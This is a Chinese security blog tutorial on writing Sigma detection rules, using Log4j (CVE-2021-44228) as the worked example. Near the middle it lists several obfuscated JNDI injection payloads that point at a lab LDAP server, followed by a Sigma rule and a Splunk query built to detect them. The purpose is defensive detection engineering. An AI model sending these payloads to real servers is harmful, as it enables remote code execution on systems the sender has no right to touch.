Sigma规则下的威胁检测

admin 2022年7月31日18:57:37安全文章评论101 views4769字阅读15分53秒阅读模式




网安引领时代,弥天点亮未来   





 

Sigma规则下的威胁检测

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!



Sigma规则下的威胁检测

0x01软件介绍

Sigma是一种通用且开放的检测规则格式(SIEM 系统的通用签名格式),可让匹配描述相关的日志事件。规则格式非常灵活,易于编写且适用于任何类型的日志文件。该项目可以直接使用sigma格式进行威胁检测,也可以进行不同SIEM系统的格式转换。同时Sigma可以通过行为规则生成ATT&CK Navigator热力图,直观看到行为模型的覆盖程度。

下载地址:

https://github.com/SigmaHQ/sigma

Sigma规则下的威胁检测


Sigma规则下的威胁检测

0x02软件安装


从github下载,该项目通过使用python运行,可根据需要安装第三方库。确保可以正常运行。

Sigma规则下的威胁检测

Sigma规则下的威胁检测

0x03常用语法


1.Sigma常用规则语法

Sigma规则支持不同应用的日志文件匹配,细分为Windows、Linux、,macos、cloud、web、proxy、network、apt等。可以根据具体的匹配日志进行详细规则输出。

Sigma规则下的威胁检测

规则所需关键字使用时可以根据需求在官方网站查询。由于这部分内容较多,这里不在做过多的赘述。下面将举例说明(最基本的框架):

https://www.loginsoft.com/blog/2020/06/17/threat-detection-with-sigma-rules/

Sigma规则下的威胁检测

规则关键字及基础框架

title: 这是一个例子 (标题)id: 5ea8faa8-db8b-45be-89b0-151b84c82702(编号)status: 实验 (状态)description: 这是一个例子 (描述)author: yunzui        (作者)date: 2022/07/31       (日前)modified: 2022/07/31references:   (参考)    -  tags:          (对应的ATT&CK)    - attack.initial_access    - attack.t1190logsource:       (日志)    category: webserverdetection:       (检测)    keywords:    (匹配特征)        - 'yunzui'            filter:       (过滤)        - 'mitian'            condition: keywords and not filter  (命令逻辑)falsepositives:    (漏洞类型)    - Vulnerability scanninglevel: high         (安全级别)

Sigma规则下的威胁检测

Sigma规则下的威胁检测

0x04实战检测运用


日志检测(log4j漏洞利用为例)

1.通过分析log4j漏洞利用原理及攻击常见payload

${jndi:ldap://10.211.55.2:8099/xobject}${jndi:ldap://127.0.0.1#10.211.55.2:8099/xobject}${${upper:j}${upper:n}${upper:d}${upper:i}:${upper:l}${upper:d}${upper:a}${upper:p}://10.211.55.2:8099/xobject}${${lower:j}${lower:n}${lower:d}${lower:i}:${lower:l}${lower:d}${lower:a}${lower:p}://10.211.55.2:8099/xobject}${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://10.211.55.2:8099/xobject}${${Lt::-j}${qAwQ:xz:-n}${j:j:-d}${PRX:jp:-i}:${r:M:-l}${::-d}${h:OjMc:-a}${OeR:iAob:-p}://10.211.55.2:8099/xobject}${${SFQv:jxfH:dhe:MNbb:n:-j}${hGS:w:N:-n}${:BAwG:A:QLo:-d}${mGFi:fjuO:::-i}:${:WhYw::-l}${X:ia::Pr:-d}${Bd:mrW:alo:-a}${N::-p}://10.211.55.2:8099/xobject}${${lower:${lower:j}}${lower:n}${lower:${lower:${lower:d}}}${lower:${lower:i}}:${lower:${lower:${lower:l}}}${lower:${lower:d}}${lower:${lower:${lower:a}}}${lower:${lower:${lower:${lower:p}}}}://10.211.55.2:8099/xobject}${${upper:${upper:${upper:${upper:j}}}}${upper:${upper:${upper:n}}}${upper:${upper:${upper:${upper:${upper:d}}}}}${upper:${upper:i}}:${upper:${upper:${upper:l}}}${upper:${upper:d}}${upper:${upper:${upper:${upper:${upper:a}}}}}${upper:p}://10.211.55.2:8099/xobject}${${upper:${upper:${upper:j}}}${lower:${lower:${lower:n}}}${lower:${upper:d}}${upper:${lower:i}}:${lower:${lower:${upper:${lower:l}}}}${lower:${lower:${upper:d}}}${upper:${lower:${upper:${lower:a}}}}${upper:${lower:p}}://10.211.55.2:8099/xobject}

Sigma规则下的威胁检测

2.提取检测特征

漏洞分析复现,判断可能利用的姿势,提取检测特征,同时考虑上述bypass的payload,还有编码绕过等。

特征1 $

特征2 {}

特征3 jndi

特征4 ldap/ldaps/rmi/dns/iiop

特征5 lower

特征6 upper

3.通过在线漏洞环境进行测试,捕获攻击流量

Sigma规则下的威胁检测

漏洞测试(存在漏洞)

Sigma规则下的威胁检测

捕获流量

Sigma规则下的威胁检测


4.输出检测Sigma规则,有兴趣的可以深入研究,规则文件后缀为.yml

title: Log4j RCE CVE-2021-44228id: 5ea8faa8-db8b-45be-89b0-151b84c82731status: testdescription: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 author: yunzuidate: 2022/07/31modified: 2022/12/06references:    - https://www.lunasec.io/docs/blog/log4j-zero-day/    - https://news.ycombinator.com/item?id=29504755tags:    - attack.initial_access    - attack.t1190logsource:    category: webserverdetection:    keywords:        - '${jndi:ldap:/'        - '${jndi:rmi:/'        - '${jndi:ldaps:/'        - '${jndi:dns:/'        - '/$%7bjndi:'        - '%24%7bjndi:'        - '$%7Bjndi:'        - '%2524%257Bjndi'        - '%2F%252524%25257Bjndi%3A'        - '${jndi:${lower:'        - '${::-j}${'        - '${jndi:nis'        - '${jndi:nds'        - '${jndi:corba'        - '${jndi:iiop'        - 'Reference Class Name: foo'        - '${${env:BARFOO:-j}'        - '${::-l}${::-d}${::-a}${::-p}'        - '${base64:JHtqbmRp'        - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'        - '${${lower:j}ndi:'        - '${${upper:j}ndi:'        - '${${::-j}${::-n}${::-d}${::-i}:'    filter:        - 'www.acunetix.com/acunetix'        - '/acunetix}'    condition: keywords and not filterfalsepositives:    - Vulnerability scanninglevel: high

4.测试检测效果

由于sigma是通过匹配日志进行威胁检测,这里需要将捕获的流量转化为日志。

1.通过sigma将规则转化为检测语法(这里以splunk为例)

python .sigmac.py -t splunk -c ..configgenericwindows-services.yml ....ruleswebweb_cve_2021_44228_log4j.yml

转化后的查询语句

(("${jndi:ldap:/" OR "${jndi:rmi:/" OR "${jndi:ldaps:/" OR "${jndi:dns:/" OR "/$%7bjndi:" OR "%24%7bjndi:" OR "$%7Bjndi:" OR "%2524%257Bjndi" OR "%2F%252524%25257Bjndi%3A" OR "${jndi:${lower:" OR "${::-j}${" OR "${jndi:nis" OR "${jndi:nds" OR "${jndi:corba" OR "${jndi:iiop" OR "Reference Class Name: foo" OR "${${env:BARFOO:-j}" OR "${::-l}${::-d}${::-a}${::-p}" OR "${base64:JHtqbmRp" OR "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$" OR "${${lower:j}ndi:" OR "${${upper:j}ndi:" OR "${${::-j}${::-n}${::-d}${::-i}:") NOT ("www.acunetix.com/acunetix" OR "/acunetix}"))

Sigma规则下的威胁检测

2.安装splunk,将流量通过suricata引擎转化为log日志解析到splunk。

splunk安装

Sigma规则下的威胁检测

suricata日志转化

Sigma规则下的威胁检测

日志

Sigma规则下的威胁检测

配置本地日志解析到splunk平台

数据输入

Sigma规则下的威胁检测

选择日志文件

Sigma规则下的威胁检测


Sigma规则下的威胁检测

日志成功解析到平台,执行搜索语法,匹配日志威胁特征,成功发现攻击行为。

Sigma规则下的威胁检测

查看匹配日志

Sigma规则下的威胁检测

Sigma规则下的威胁检测

0x05总结思考


日志分析作为安全运营中心(SOC)最重要的一个环节,针对日志的威胁检测尤为关键。同时以日志为数据源的安全产品层出不穷,其中 NGSOC目前最受欢迎。而Sigma目前作为优秀日志检测规则匹配,并结合ATT&CK攻击框架及杀伤链,可以大大提升了对威胁狩猎和攻击路径溯源的时间成本,希望对检测响应方向有兴趣的同学可以一起交流学习。

微信见下上篇(Suricata规则下的威胁检测

https://mp.weixin.qq.com/s/91f-xjj5b2yBjwre9xUbvg


















Sigma规则下的威胁检测 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

Sigma规则下的威胁检测



原文始发于微信公众号(弥天安全实验室):Sigma规则下的威胁检测

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月31日18:57:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Sigma规则下的威胁检测 https://cn-sec.com/archives/1212357.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: